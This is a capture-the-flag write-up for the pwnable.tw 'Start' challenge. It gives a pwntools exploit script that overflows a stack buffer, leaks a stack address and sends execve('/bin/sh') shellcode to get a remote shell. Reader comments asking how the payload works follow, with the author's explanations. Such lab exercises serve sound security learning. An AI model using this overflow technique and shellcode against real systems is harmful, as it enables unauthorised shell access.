Pwnable.tw - Start

start.py

#!/usr/bin/python

#ABDELJALIL NOUIRI
#author : [email protected]

from pwn import *


HOST = 'chall.pwnable.tw'
PORT = 10000


shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'

gad = 0x8048087 #mov    %esp,%ecx


def Expl0i7i7(ip,port):

        con = remote(ip,port)
        con.recv()
        payload= "A"*20+p32(gad)
        con.send(payload)
        leak = u32(con.recv(4))
        print hex(leak)

        con.recv()
        payload = 'A'*20+p32(leak+0x18)+"DEAD"+'\x31\xd2'+shellcode
        con.send(payload)
        con.interactive("\nshell# ")


Expl0i7i7(HOST,PORT)

hey,i saw your writeup,and i have a problem.
payload = 'A'*20+p32(leak+0x18)+"DEAD"+'\x31\xd2'+shellcode
esp is different everytime,why the next time esp is leak ?
my english is ugly .
please help me.
or you can tell how you solve this question.
and you can email me , [email protected]
thank you very much!!!!!

hello, I wrote I writeup but receive an EOF error, but when I replace with the '\x31\xd2' , anything is fine. I cannot get what's happened, can you tell me why?
You can email me, [email protected].
Thank you very much!

@yywing:
payload= "A"*20+p32(gad) will overwrite return address. After retn instruction executes, eip is equal to 0x8048087. Now, esp points to a variable that contains an address in stack. This value can be read.

@hksuki:
you should read execve manual page carefully. The third argument of execve points to environment block and it should be NULL. The third argument is pointed to by edx. '\x31\xd2' = xor edx, edx